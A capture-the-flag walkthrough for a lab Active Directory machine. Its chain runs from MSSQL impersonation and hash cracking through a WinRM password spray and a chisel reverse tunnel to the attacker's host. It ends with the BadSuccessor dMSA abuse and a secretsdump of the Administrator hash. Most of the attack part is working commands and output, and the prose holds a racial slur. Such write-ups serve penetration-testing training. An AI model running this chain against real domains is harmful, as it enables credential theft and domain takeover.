Goal: Start from low MSSQL creds, pivot via impersonation and web hash crack, reuse to WinRM, map AD with BloodHound, then abuse Bad Successor (dMSA) on Server 2025 to dump NTDS and get Administrator.
Quick checklist
- Add hosts entry for the target
- Fix Kerberos clock skew
- Enumerate MSSQL and impersonate
appdev - Extract admin hash from app DB and crack
- Password spray to WinRM and get shell as
adam.scott - Run SharpHound and analyze in BloodHound
- Confirm OU write on Staff and Bad Successor path
- Create dMSA, request ticket, dump NTDS
- Log in as Administrator and grab root flag
1) External enumeration
Nmap essentials
sudo nmap -p- -Pn -sCV 10.129.xx.xx
Findings:
- 80/tcp IIS 10
- 1433/tcp MSSQL 2022
- 5985/tcp WinRM
- Clock skew ~+7h (breaks Kerberos)
Fix clock skew
- Option A (temporary): run commands with faketime
- Option B (recommended): sync to target with ADUtilities fixtime script
sudo ntpdate 10.10.11.95 or use fixtime.shRefs: fixtime.sh · ADUtilities
Hosts entry
echo "10.129.xx.xx eighteen.htb DC01.eighteen.htb" | sudo tee -a /etc/hostsWeb recon
Visit http://eighteen.htb`
sign up a normal user
Admin area exists at /dashboard but is restricted so nothing much here.
2) MSSQL: logins and impersonation
Starting creds: kevin / iNa2we6haRj2gaw!
List modules and logins:
sudo nxc mssql -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -L
sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_logins
---
└─$ sudo nxc mssql -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -L
LOW PRIVILEGE MODULES
ENUMERATION
[*] enum_impersonate Enumerate users with impersonation privileges
[*] enum_links Enumerate linked SQL Servers and their login configurations.
[*] enum_logins Enumerate SQL Server logins (SQL, Domain, Local users)
PRIVILEGE_ESCALATION
[*] enable_cmdshell Enable or disable xp_cmdshell in MSSQL Server
[*] exec_on_link Execute commands on a SQL Server linked server
[*] link_enable_cmdshell Enable or disable xp_cmdshell on a linked MSSQL server
[*] link_xpcmd Run xp_cmdshell commands on a linked SQL server
[*] mssql_coerce Execute arbitrary SQL commands on the target MSSQL server
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
ENUMERATION
[*] test_connection Pings a host
CREDENTIAL_DUMPING
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
PRIVILEGE_ESCALATION
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module└─$ sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_logins
MSSQL 10.129.xx.xx 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.xx.xx 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
ENUM_LOGINS 10.129.xx.xx 1433 DC01 [*] Enumerated logins
ENUM_LOGINS 10.129.xx.xx 1433 DC01 Login Name Type Status
ENUM_LOGINS 10.129.xx.xx 1433 DC01 ---------- ---- ------
ENUM_LOGINS 10.129.xx.xx 1433 DC01 appdev SQL User ENABLED
ENUM_LOGINS 10.129.xx.xx 1433 DC01 kevin SQL User ENABLED
ENUM_LOGINS 10.129.xx.xx 1433 DC01 sa SQL User ENABLEDwe got various users appdev, kevin and sa.
So lets Check impersonation:
sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_impersonate
---
└─$ sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_impersonate
MSSQL 10.129.xx.xx 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.xx.xx 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
ENUM_IMP... 10.129.xx.xx 1433 DC01 [+] Users with impersonation rights:
ENUM_IMP... 10.129.xx.xx 1433 DC01 [*] - appdevConnect and assume appdev:
impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.129.xx.xx
# in SQL shell
exec_as_login appdev
└─$ impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.129.xx.xx
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)>Enumerate DBs and dump users:
enum_db;
USE financial_planner;
SELECT * FROM INFORMATION_SCHEMA.TABLES;
SELECT * FROM users;SQL (appdev appdev@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
SQL (appdev appdev@master)> USE financial_planner;
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
[%] SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
----------------- ------------ ----------- ----------
financial_planner dbo users b'BASE TABLE'
financial_planner dbo incomes b'BASE TABLE'
financial_planner dbo expenses b'BASE TABLE'
financial_planner dbo allocations b'BASE TABLE'
financial_planner dbo analytics b'BASE TABLE'
financial_planner dbo visits b'BASE TABLE'
SQL (appdev appdev@financial_planner)> SELECT * FROM users;
[%] SELECT * FROM users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03We got this nigga financial planner so we used it and enumarated the database ,,,,,,,and for sure we got what we needed the credentials
we got the admin hash
pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133Find an admin account with a PBKDF2‑SHA256 (Werkzeug) hash in the users table.
3) Crack Werkzeug PBKDF2‑SHA256 with Hashcat
Convert to Hashcat Generic KDF format and crack -m 10900.
python3 - << 'PY'
import base64, binascii
h='pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'.split('$')
print(f"sha256:{h[0].split(':')[2]}:{base64.b64encode(h[1].encode()).decode()}:{base64.b64encode(binascii.unhexlify(h[2])).decode()}")
PY
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt --showRecovered: admin:iloveyou1
Let’s use this credentials to login back to website and check the Admin section to see if we can find anything useful.
Refs: 0xdf note · Hashcat thread
4) Spray to WinRM and get a foothold
RID brute for users:
sudo nxc mssql DC01.eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-bruteCreate users.txt and spray the cracked password:
sudo nxc winrm DC01.eighteen.htb -u users.txt -p 'iloveyou1' --no-bruteforce
└─$ sudo nxc winrm DC01.eighteen.htb -u users.txt -p 'iloveyou1' --no-bruteforce
WINRM 10.129.xx.xx 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\Administrator:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\mssqlsvc:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)Hit: eighteen.htb\adam.scott
Get a shell:
evil-winrm -i dc01.eighteen.htb -u adam.scott -p iloveyou1
User flag:
Get-Content C:\Users\adam.scott\Desktop\user.txt
and there we got the sweet flag.
5) Priviledge escalation and root flag
Here we go to explore which rights we have as adam what we can run.
*Evil-WinRM* PS C:\Users\adam.scott\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledApparently, Adam.Scott can add workstations and increase working set privilege. These privileges point toward Resource Based Constrained Delegation (RBCD), more precisely, a BadSuccessor attack seems promising.
Before moving further, since the machine does not expose many ports, we upload chisel to access all the services running on the machine.
6) uploading chisel
*Evil-WinRM* PS C:\Users\adam.scott\Documents> upload chisel.exeNext, we start chisel in server mode on our machine, and in client mode on the target.
chisel server --reverse --socks5 -p 6000
Start-Process -FilePath C:\Users\adam.scott\Documents\chisel.exe
-ArgumentList "client","10.10.16.x:6000","R:socks"Having prepared the basic setup for performing the Bad Successor attack, we can now proceed with the attack. We used chisel for a coz it has a cool workaround (Impacket’s getST.py). The BadSuccessor.exe binary can be downloaded from here.
Next, we upload the binary.
evil-winrm-py PS C:\Users\adam.scott\Documents> upload BadSuccessor.exe .Then identify the target Organisational Units (OUs).
🧩adam.scott (via IT group) can WRITE on OU=Staff. Environment is Windows 11 / Server 2025 (Build 26100). This suggests the Bad Successor (dMSA) path.
Refs: Intrucept · Akamai · CVE‑2025‑33073
Validate permissions:
evil-winrm-py PS C:\Users\adam.scott\Documents> ./BadSuccessor.exe find
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] OUs you have write access to:
-> OU=Domain Controllers,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll
-> OU=Staff,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll, CreateChild7) Priv‑esc via Bad Successor (dMSA)
** * Create the malicious account.***
Create dMSA linked to Administrator and grant self‑service:
.\BadSuccessor.exe escalate \
-targetOU "OU=Staff,DC=eighteen,DC=htb" \
-dmsa "BAD_DMSA" \
-targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" \
-dnshostname "BAD_DMSA" \
-user "adam.scott"evil-winrm-py PS C:\Users\adam.scott\Documents> .\BadSuccessor.exe escalate -targetOU "OU=Staff,DC=eighteen,DC=ht
b" -dmsa BAD_DMSA -targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" -dnshostname BAD_DMSA -user ada
m.scott -dc-ip 10.10.11.95
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] Creating dMSA object...
[*] Inheriting target user privileges
-> msDS-ManagedAccountPrecededByLink = CN=Administrator,CN=Users,DC=eighteen,DC=htb
-> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
-> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute
[+] Created dMSA 'BAD_DMSA' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' (DC: 10.10.11.95)And now we move to the final phase of extracting the ticket.
For executing this, the latest version of Fortra-Impacket from the main branch which supports the
-dmsaflag is required.
Next, we get the TGT for Adam.Scott for kerberos authentication.
proxychains4 getTGT.py eighteen.htb/adam.scott:'iloveyou1'
[proxychains] config file found: /etc/proxychains4.confexport
export KRB5CCNAME=adam.scott.ccacheThen we impersonate BAD_DMSA through Adam.Scott and dump BAD_DMSA krbtgt.Use;
proxychains4 getST.py 'eighteen.htb/adam.scott':'iloveyou1' -impersonate 'BAD_DMSA$' -self -dmsa -dc-ip 10.10.11.95 Now, using this ticket, we get a service ticket for cisf/dc01.eighteen.htb to dump credentials.
export KRB5CCNAME='BAD_DMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'proxychains4 getST.py -k -no-pass -spn cifs/dc01.eighteen.htb -dc-ip 10.10.11.95 'eighteen.htb/BAD_DMSA$'And finally, dump Administrator’s credentials using the service ticket.
export KRB5CCNAME='BAD_DMSA$@cifs_dc01.eighteen.htb@EIGHTEEN.HTB.ccache'proxychains4 secretsdump.py -k -no-pass -just-dc-user administrator -dc-ip 10.10.11.95 -target-ip 10.10.11.95 dc01.eighteen.htbThis reveals the admin hash.
ROOT FLAG
Finally we can get root flag.
and we got it
and there we have it.
Lessons learned
- MSSQL impersonation + app DB exposure = quick credential leverage
- Password reuse enables easy lateral movement to WinRM
- Server 2025 dMSA + OU write can be catastrophic (Bad Successor)
References: fixtime.sh · ADUtilities · 0xdf · Hashcat forum · Intrucept · Akamai · CVE
HAPPY HACKING!!!
Comments